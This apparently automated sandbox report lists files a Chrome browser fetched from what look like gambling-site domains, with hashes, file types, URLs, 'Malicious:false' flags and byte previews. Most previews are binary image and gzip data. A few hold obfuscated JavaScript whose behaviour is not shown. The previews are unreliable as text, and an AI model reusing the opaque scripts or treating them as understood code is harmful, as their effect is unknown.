                                                                                                                                                          SHA-512:43719D7143D827A96EFC43B51EE525E9724AFD2CA39D48691D91B092388FD8D10229465A0A3D2D8B4575F2CF950B38D6CC288F94B9B0B1AD23EFF73987A053A6
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:tZEkTJqSCi7LdbBGlJOnk5iH8h8U/qoeVixdvl4fo1AoDuyoHBnfpJb75B8A3ixSkb/5J/9TwIN0DmNUMG29h5G/+Sf/U8CDdA5jVDBtvYeRv/kn/1PAg3QOY1Qwbb2Hkb/5J/9TwIN0DmNUMG29h71c1wdYdVABGu3eqsdBDcaRv/kn/1PAg3QOY1Qwbb2Hkb/5J/9TwIN0DmNUMG29h5G/+Sf/U8CDdA5jVDBtvYeRv/kn/1PAg3QOY1Qwbb2Hkb/5J/9TwIN0DmNUMG29h7TuTKUcdu5m7ViJj5FZkY2RnmowBJBp6WUdIaVTQ9TpEpFSZssEoQtEcjB+uJf5DetqSYvquAWMM6ryIuS3mM2ifn76bXIs3pPib164jeJG5Ma9MJKhc3RQPRC9fYKhH6Qkuet3tl0s3/f0/gyJbvdO4ntkI56uxNMeR4fQNYGpJ4m4v1mLM9kv/Raz3TBVUt3wJjlrnowalVGtquIQsMdNLGJaONlE7fV++JnrTNtiDUg57yH9eEnlLyNzAdrO/WfLqbj/Cf1Ck1Od8rXARbvJeAZr/TsEIjfMKZmuHRuicjkyKzgsF1BdI70TTUy263/GO/NdHcnWcdwmwFVvO4yK/IAL/wG/z+aMchxCmx3U/NwcwwXEv5LDfDQqw7c7vfjNbY8bfU7lbOjE/2akWD/2UcNAP8xk3VqymjIGkhfhW0H6r89sHdixPJHEiE0iDSsYbX11i1rkZbRXZTxNnMSzgQki0LZ+gJzpYCckRj/9T/J7WgMPutVpV6Ujx43Ij6YpJKvajns7jbtS3MjgwjdZb+7WHn7uE1xZts8Pt6mlOHCJig1sHPUsrbT2Nz2S7nNgWULeUf6VNyHs4M+0flhTLpJTzlYsGuyl7YW8ivw5jN7XX3nBKvmcWRRHQxoH7K2Nbs4UDh7g/ahScSgIMr1szQ5qs7Pzwyg5VZp2iQWt3Mppe/NmPllNsWGmZEb8AzQZ/CWJrOIByIKZOe6K
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:gzip compressed data, from Unix, original size modulo 2^32 1739
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):785
                                                                                                                                                          Entropy (8bit):7.731303083791263
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:12:XG/rvvilE2YCI9gCezkgJxu9NTXh2pnI5EqlISaw3hebbMS4F5m1o5k/g4TR:Xhg9MJo9dXYpglIJOo/OCe5hKR
                                                                                                                                                          MD5:8A882E078EDEA30F56A1CEBB96C7F525
                                                                                                                                                          SHA1:3E42883B5A845DF9A95B29880C76CAB2280A6179
                                                                                                                                                          SHA-256:332D7B1CCCB2951E6182F8580BCB0C9994FA94918ED924B422E35F909192AD65
                                                                                                                                                          SHA-512:460CE2B74DFAEA4F467047914AC792369B8B9506B42527A62A5AD5C58AE78845078EA3FBD6B0199D6AAF2291213C6CD668CC0D8B51E7B1F2B8ECC73EAF47BE60
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://brhrjf.yuhu06.xyz/061410/rcenter/common/js/curl/curl/loader/legacy.js?v=1717580749344
                                                                                                                                                          Preview:...........U.o.0..W..*[q.v{.....io.m.i.:.B..d.i.......X... .........e...i^.e.Rq..~j.?.fu.....$....q...,.........~.:.Jsk........2..t...uao...`....U.^^..P.....vPXJL.$LH..c.+...c.*T.A...8N<.X...yX.#...E.....9..~W...d......&.......T..G......>.0....{tg.*..&.k.yd.\..>.F..l...3.(...o|yy..[].....wZ...'o...:x.vO./*.6N.^L.c..Y[1k..x.r.+....z.O.|[.X4-..y*.@S...u.%|...S..'dq..}6..u..k.4E.$/u..j..r.?3.u*.r.l.k.c.h......!........EO..l..H.vAHH,..\I...`&#=.......G.....e.8.#..^.2.../.u.'.-..W.5 .Q....9....=G=.-.s.@.R......W...A.].....p...L6Nq..>.=".R....(O`.Z..p@'...&......F..t\Ip.. v`.L...{.I..&.~..........L....jO..MR..v{.......~'.A4~.6>.B{;....4.8.v;....k.p...K^.Y..!.x.wI96....g..6..-....F.jm.nm..\.g.qL...1.....eM..j....q[DU..8._.h.....:mM..z...?.R.4....
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, baseline, precision 8, 659x544, components 3
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):75656
                                                                                                                                                          Entropy (8bit):7.973251684846932
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:aFt/QuDmbbvL7nMJ2DFOH9+8MFYPy2cKLnruYN1hM173nJ/s+YXxnFSj/dzvQ:uQs2DswFI9hfcIiYK5nObXLSLFvQ
                                                                                                                                                          MD5:B8D7A960A4B6C034F047FF01DD4D9C43
                                                                                                                                                          SHA1:59196BB3341EA91A5A55270224A76FDC20E0EA54
                                                                                                                                                          SHA-256:9F8AFC863F5B3C95ACB8B8006DBF54857C58C904170D2F89B372F0F29887923F
                                                                                                                                                          SHA-512:6613A02E861D4EAE2B2FFDAA58E8AE493855A831CA43D33C57AA54178509A0E0E02B5B0F1032F10EB912BE450447D3295209DD805C69FB740E613EB759FD923B
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.............................................................................................................................................S....Adobe.d........... ..............................................................................................!1.A.."Qa.q.2...#B..R..b...$3r...C...%cs.45T..........................!1..AQa.."q2.B..#R..34.............?..l.3.+M..~.oe.I.YO..I.......*."*<v.HvI..'...L..\....On.Hd...d..Oo.`l9(.>....,.....2%.%...$E.tV.....l.m....Z.Y#l...Sh.~PF..5v{I...4&k,..Sp..6.;W.dv.,.....q...A.F..l.6. k.......L.u..@.e.....0....C....b4t.l..;f..6........&.#....aK.4..#..W..q..X|.b.G!..wjp.'*.3d..nT^{...../&..FoJ...#s..(..Q......).bn.2TsbM..6......UI.....Tk..C..l.).......+TJ.*.4..:..%.6Q......U.lGlNx...0...j$...(M.4./#N.tBL6.s...~.....E.d.r...lY[..#..o...5....;.tr....^AW.r.%..S|..C.....dpqy..7lT....7.......S..Z=...v..............U..g%.J'..9..l..g.{E,TT.... .G....d}.....V.....\....X$|.....~.........I6.7...7.,mFR<'...>m./..{...
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 1920x144, components 3
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):2606
                                                                                                                                                          Entropy (8bit):3.7483638467146463
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24:UyYHu0qHk7yI5/4NZBxY3uaYbh09pbUEdFH2LxrnWXm:UyYVqcyS/EZBC3ulh0HbtH2Lxrnim
                                                                                                                                                          MD5:90D3C2727BCF19B525AD48DB9E551895
                                                                                                                                                          SHA1:52F583E4A3EAD51B606F69FE7039CBA84DAAFC64
                                                                                                                                                          SHA-256:EF6394DA4FA97DE9A1D6BC3DD3FAB9577A8153614F42C3A86F89BAE635EE40B3
                                                                                                                                                          SHA-512:9B02C0F5A7FE1AB4A4276911C6352C57AFD2B5AD29DEF928BFF0FBE910D4AE64A6F174EB505F87BCF1E1ED13CCE0010A52422BA5D6DC12AF3DF638668A53A2D1
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:......JFIF.............C...........................$ &%# #"(-90(*6+"#2D26;=@@@&0FKE>J9?@=...C...........=)#)==================================================....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................P..P. ........ .. .........@.............................................H.................(....()J".,U.)AV.Q..@B .!....P........................................................R..............*...P.(.TPR..ZQ..AATP......H*..(B........................................................ ...........................V.E.Q@............T@ ............................................
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 60 x 60, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):5406
                                                                                                                                                          Entropy (8bit):7.875836177006229
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:96:mYzFqu2hiwWx/nqMtwje6LcBlKgEBkTnieTOzUXAaZFszy3d2FcOZQ:n3wWx/quw6VIMeiNZEQ
                                                                                                                                                          MD5:0828B6BE9143DDF7D21123D39FF5A13C
                                                                                                                                                          SHA1:008BE056809423055B06BB6705A5C8A990706ED1
                                                                                                                                                          SHA-256:767DCEC9219465104F17C5D75389DE4AE5EEC8ED85CDD4725C7684707F2C9C1D
                                                                                                                                                          SHA-512:E09959DFF2519DCAD30B07C4A1399E25B96183E29AA1CCB3173FF9A7C27C866D59EFBF072F1D85B5F3C807ABDB4BC7617E6CBEB5506575C77F849BA2947C1B71
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/nav/icon-b/live_bg.png
                                                                                                                                                          Preview:.PNG........IHDR...<...<.....:..r....tEXtSoftware.Adobe ImageReadyq.e<...viTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c145 79.163499, 2018/08/13-16:40:22 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:dc7bb777-32f7-c247-8a71-326368638fe8" xmpMM:DocumentID="xmp.did:0775CB5AF77811E8AE71AEF0D532570E" xmpMM:InstanceID="xmp.iid:0775CB59F77811E8AE71AEF0D532570E" xmp:CreatorTool="Adobe Photoshop CC 2019 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:c5537c56-d66b-9f4a-95f4-82eac84c99bc" stRef:documentID="xmp.did:dc7bb777-32f7-c247-8a71-326368638fe8"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.<p....>IDATx..Z.t....o{..$!$a..a
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 text
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):24
                                                                                                                                                          Entropy (8bit):4.1887218755408675
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:uuKln:uu4n
                                                                                                                                                          MD5:356555E64410CB07748C013C7862421C
                                                                                                                                                          SHA1:9FC2E0D7B2297CAB2DD4824D42BB20AF8CE1B6FE
                                                                                                                                                          SHA-256:9BF353A4E2B515DA809F62D31F61F5FD659AB8FFA04E1AC7A3304F2B05510748
                                                                                                                                                          SHA-512:0A14AE03555EBA744339B7632B8F5D382F60232499BC4D773D88DBDB7E3FAEAB7CC2815477EF59A68D500E648F977ECB68EA03D9DC9CB88FAD7201F2876D9A7C
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:....(empty-777).
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 30 x 26, 8-bit/color RGB, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):1663
                                                                                                                                                          Entropy (8bit):7.227069440381623
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24:Z1hNo7FCWwjx82lY2T3/VtutnAyJ3VtTtNRGnNGt9RlDSCWoHgTzWmuDAsQK81M1:nzo7FDNn2D0J3hD5nATXCjl7PrN7
                                                                                                                                                          MD5:E0C729B429763EC4769854793033211D
                                                                                                                                                          SHA1:578A8A468E66F7911C9230AEA7A6E4048BE5D70A
                                                                                                                                                          SHA-256:9F07B480C84492E65AEBC6BD303587C1B979C53DF555E3BCA1FECC5690829DC3
                                                                                                                                                          SHA-512:1B5247929E7333191176626DFCADAB2B9B92F007C29B1F4CC35247E153C7D71253291896D5F71F5CF2939FC615EE7AEE11CA6017EB98AAD32DC17F4395EE26E1
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-qq.gzjqwlkj.com/pc/image-pc/index/121/nav/promoico.png
                                                                                                                                                          Preview:.PNG........IHDR............./.{.....tEXtSoftware.Adobe ImageReadyq.e<...!iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c142 79.160924, 2017/07/13-01:06:39 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC (Windows)" xmpMM:InstanceID="xmp.iid:A8D68411A6D711E9ACBEB1FE1B090C8A" xmpMM:DocumentID="xmp.did:A8D68412A6D711E9ACBEB1FE1B090C8A"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:A8D6840FA6D711E9ACBEB1FE1B090C8A" stRef:documentID="xmp.did:A8D68410A6D711E9ACBEB1FE1B090C8A"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>...v....IDATx..V]HSa.>.9.wN7..J.i).~.....(...Q.T`..^.D]ta..A.M].T.u.....0..0P3'6...Pg..9.9....,..~B..|..}..{..{....vls.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):127284
                                                                                                                                                          Entropy (8bit):5.964603194377986
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3072:cky/4ZA5fj6hXRyxAgjTvyjoph3gv4TY9gAm6:ckyh5fjAXRyOgHuof3gv59gH6
                                                                                                                                                          MD5:6C48020EC55839D18BB77C2A28C08404
                                                                                                                                                          SHA1:BBE2E524D3141DB333CB11774AB84E79D9E7423A
                                                                                                                                                          SHA-256:17D6DD25D3459F4ADA6C0F53A9D7009FCF2288F54907715A3A8423B837753400
                                                                                                                                                          SHA-512:A7DDA0387C8C25D759181E58A0FD25DCB3AD41FAADEACC61E208456D35D1DCB65BD4F3C67AD0AFDD3A23C12758374D137C5A6163326414C650B46D2D1C8E7784
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/240516-03/static/js/common.js
                                                                                                                                                          Preview:a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtAjAJgGZcBdAGgG8AiABgA4BzAZSoC4AzAVzRgBcBLdJl5kQZNAEpqnJCAAESXgCd+fKgG4QAOigBeCiB4oAJiA7c+gtMKm9dXHgKG8pANyhK5YtGSVl+6uwoSpggulRUvrq8WgA2hgy8ABbiujTqaAA8ShkA1LkSmPzRWjBJHgDCJiAAgryYkhIAfLq4AGRt/Jmt+ADsAPwguSVlHnUNEqz8Tfg0ACwDocNMyvxoDFrsSigAthXlSlWmmPj4cwA+000EbbgArBKiy6vrm9t7B0cgmAR0l01NABsbUBhEeQ10KxUry2u32lWqP3wfyuNBBYMmS0hLw2sI+COOuAAnPh/kC2sRwc9obj3vDDojfmS0aCJBJ1EoQLxOEo0F4AL42dTuTzeXz+MhQMgoMhIcI1ABCFQAIgBRABiAHEABIASQQAGkADIAWQAcgB5AAKAEUAEpMAAqAFUAGoAdQAGgBNABaUDAMFM7AYSX4ACs4LEdmgUBAAI5KRScVzAAAeAE8AF40AiEOZ3QG9OhE3IAeg0QRCShK8XWyVSNFE4Q0WRyUn47CKunwdzubRiowZpnGaHyjzQul0SikEKQpQO4yu+CpunnQ/GmEInQkmUyc1XVCnGjAnKgcH5ncwekHn2qo/HqWns+G68X9WXq7fY3qW53e4uE45jRKBmiaA8njXBcf0wH5+1AvcV0go8TzPC8UBGO8R3qMcCkg78lCXAEkLnaDCN/bd+F3fdziAkCwIg0iN1/e42gQzJSR+Ek2hQMDAS/MjxlBHiJH5TluV5AUyFMGBqnMRwrBsCgq0wEUvHEcV+ElXQ0BAYA5BqJQlCgDNMAAWlwMgLKsyzrLs2yHJspz7OcxyXPctzPNc7yPJ8rzfICyzAXwPyyFBMg7hCu5CAiuYIruCLAQi3oIroCKiTCptAX8nKnKbSyQpiuKEqSlK0oy3B8ssggyFwGLcDi+5a
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 231x135, components 3
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):17878
                                                                                                                                                          Entropy (8bit):7.959716583208729
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:OBLtpneFRErL/izHYU4KNT+GbKJrnl0YMMlTY3X4K6gwI:YtpnCErkN4K8GbKJrnl4Y/gL
                                                                                                                                                          MD5:3421B805EE092419843BD0B3CF2F3AD5
                                                                                                                                                          SHA1:FCDCA9406D3B0A7DE619225D006968F16F401528
                                                                                                                                                          SHA-256:2E72A4B6BB750E21045AA7BA60ABFBD2EA5FB721579ABD2F75875008FD815BD4
                                                                                                                                                          SHA-512:1A8AD295C8B019AE032F5CF1F3A188C189F8B128F6459174D3817147338E3AAD4BE739E869D796161D5F0390820D96916E16FEF371FD9F33C5282B92F67D5599
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/video/allbet_h.jpg
                                                                                                                                                          Preview:......Exif..II*.................Ducky.......P......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:29498082-5ddd-3c4d-86ad-a7cbd10a716b" xmpMM:DocumentID="xmp.did:BF908D208D5811E78563D2E50C3F5203" xmpMM:InstanceID="xmp.iid:BF908D1F8D5811E78563D2E50C3F5203" xmp:CreatorTool="Adobe Photoshop CC 2017 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:82b9be3e-f922-d048-8196-e2c819558962" stRef:documentID="adobe:docid:photoshop:eddc2de5-6163-11e7-92d7-efec1b3bcc87"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d...............................
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 114 x 114, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):5841
                                                                                                                                                          Entropy (8bit):7.871888768386612
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:96:F5kmaitWhCGXXg05GXYnZDXnXZkHtvKBStJd4yAYcRM8RySxNIEVXyC:ajXp5GonR3XKNRGyDgp1IEVXJ
                                                                                                                                                          MD5:BCD45CED07A9623523B13BA9C1B0DF7F
                                                                                                                                                          SHA1:656C06C91B5F5718BFF89828CD08B139A05C9128
                                                                                                                                                          SHA-256:A5CA08AA4D39A0297A5BD6CAA84AF6D569D2CA40DDA40D89422251E975B55D5B
                                                                                                                                                          SHA-512:2F583916DB15FFAA3D47AE7769D900DF7CB2D816D79C8B98CDB3A699A073FA2506F4D685327400076165B4A40AA2E10E210436B03510BC24C70C4C0F51604670
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/nav/icon/lottery_vr.png
                                                                                                                                                          Preview:.PNG........IHDR...r...r.......}....tEXtSoftware.Adobe ImageReadyq.e<...niTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:420a253f-21eb-c14d-bee9-9f8f530514c9" xmpMM:DocumentID="xmp.did:B8082874819511E78C02F58BB957D46E" xmpMM:InstanceID="xmp.iid:B8082873819511E78C02F58BB957D46E" xmp:CreatorTool="Adobe Photoshop CC 2017 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:F1FEA7DC733311E791979FB237C57C41" stRef:documentID="xmp.did:F1FEA7DD733311E791979FB237C57C41"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.g......IDATx..]...U.}.......d.5.+JVAY%(
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (1508), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):1508
                                                                                                                                                          Entropy (8bit):5.8012686077032365
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24:V/IuRx4iKI/YOkStcE47QfKFAvgEf+qjijnrmhcRch2nRs:V/Rx4pI/zkSt0kS4glqjMnrmwchJ
                                                                                                                                                          MD5:71F1D2A1B8A7E16EA382FA2A18961662
                                                                                                                                                          SHA1:90A19705EE1B2854B4C2901A3103B0961966A0B9
                                                                                                                                                          SHA-256:F7205AEC396A6156872A52FF89822817285224424505F1A7A9251243CC91C827
                                                                                                                                                          SHA-512:E61F2B64E12262AC2135E863C20783216407440014DE8EBB2204E9F5CB75883E6A03D9620D18A9C15F6C1037698273A0D6D1E6EC0CF341CF112CD363B967D305
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb1-hw.qectyoua.com/pc/240516-03/static/js/components/alertBox.js
                                                                                                                                                          Preview:a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtALAZnwF0AaAbwCIBGAJwFUBpCgLgDMBXNGAFwEt1MUEkhLcAlJXZIQAAiTcavHhQDcAeTAArEDwB0AExCteaEAAUaKCCBrcAnphEUA+s5BIAsin3sANiApyADcoX3YQZgBCAAYAXzEVEJoZEABebkwKABF9AA5gCjESNHTdNEwQIt50zIA5AE0ADzVCkhga7PYAegAmVpRUzHKxTDJYkg1tHkxeXQBbKAgPdm4oPnQkEbIYXxRpDyQAc2YYXQAJePJ9FHr3Nk4efmGybgALXiR5o7MoGig53RIV4oYCpSJUUTvT5zb6/f66GChXxgWBwABkaLeHy+hx+fwBiN8yNRmDEsUuw1G40mOgyswWEAA4iBuNwbJscBQYbi4XMKEQxEUyPo1lB7lx1s8aCz2DQ0GQPgAhXxQNBwKJUckkYBrGCvZiUbl4+FAkEsDgSp6CCRJOTpKEqKAY6TcAAqvDmIBQK0wFseAgkABJMgBiaCHEAeKBIOCFXQRjLRMQAfk+SpVarB0WYaaQytVcDBmpIPSoSa1nre3iQzEpYwmWlpM3mi2Wq0lHO2u32RxO50uwpudz9ktJLyhOONANNoPBkOxRt5CKRKPgGKx0Nh+OXRNXcFJ5KKMBQcwgKxA+lrpKpDamdJbTJZbJoHOwXK3/35gra0rWF/F/rPIeJA0KkZDSmghg0ABo42r8MhQPaHzCKkUC6IGMC/myACi/iemg3CiKhujONIvisCRMAAD5UUgKjStwspoDIGQUAoqpILwkqBGQawKDWZBoP8EQUKwUCGIEczeCJ3rcAAtCYFBatgaGLtuM7Jqx+i8EEPF8S+Bq8JeFChDY3CKigjRKeM2BaTpPHyGsSgAMIqkgNZctGsZtG5AlgBm6poemBbAWhzhBJkMitHZunkI5fAwK50YeaZthyQsik2TFDnti5vnMBQrwgOJNhKSQtmZEg0BoIEKkkRFF
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 60 x 60, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):4995
                                                                                                                                                          Entropy (8bit):7.844020717243741
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:96:mYzFJu2h52FiWpjGEajo3c/dUbVLtBba9EeH2u2ZfBVnElDIh:nF2FBpjPzZJRa6eWFLxElMh
                                                                                                                                                          MD5:84FD3F46A0E9F8775370D3D18B5DAE0B
                                                                                                                                                          SHA1:8AFC572F08A79131E4D469AA3597DA3748395275
                                                                                                                                                          SHA-256:E8D604B5D705CCA42C52F416CB6943A9060601D7A6275A9C228B08C723FD181B
                                                                                                                                                          SHA-512:0C0C728159CEF8CC150E54AC770FF1531BA5C7FAD0BD1E42D7C345DB2C785C064BC79C9C8D7D97F84003B9DAE1B24876F098007D64172B82EFC5CF17F937E721
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/nav/icon-b/game_fg.png
                                                                                                                                                          Preview:.PNG........IHDR...<...<.....:..r....tEXtSoftware.Adobe ImageReadyq.e<...viTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c145 79.163499, 2018/08/13-16:40:22 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:dc7bb777-32f7-c247-8a71-326368638fe8" xmpMM:DocumentID="xmp.did:079ED834F77811E8AE71AEF0D532570E" xmpMM:InstanceID="xmp.iid:079ED833F77811E8AE71AEF0D532570E" xmp:CreatorTool="Adobe Photoshop CC 2019 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:c5537c56-d66b-9f4a-95f4-82eac84c99bc" stRef:documentID="xmp.did:dc7bb777-32f7-c247-8a71-326368638fe8"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>........IDATx..Zk...u>..y...Vh....
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:gzip compressed data, from Unix, original size modulo 2^32 54576
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):5666
                                                                                                                                                          Entropy (8bit):7.9502577323919
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:96:8L5mRVH/KrjXqooRoZxhbv9+/r9o3itgDafNNwcYdkJBpS/McMV8ZCCzQaYl:8OVHO6RGv9+/ry3ugDidlJBw/Mcu8ZCD
                                                                                                                                                          MD5:EE13F724BAE7018EBE07BB5D6AF03AAF
                                                                                                                                                          SHA1:C50182CDF7E632E35EBDE9118B91E19D900B87E8
                                                                                                                                                          SHA-256:E5FBABB419AB24FF6AF5DB9045338DB90C20E058B5AB94C02D2EC725E1C75F51
                                                                                                                                                          SHA-512:334C0488EAA373438EA62D18DD93C6C79DDC0B9AB8FC8C4350D5792F5156AB8ACDA55E9D39728CEC48C1D2714FA8E339D361B449ADA34879F23704C092C043D4
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://brhrjf.yuhu06.xyz/ftl/commonPage/themes/hongbao.css
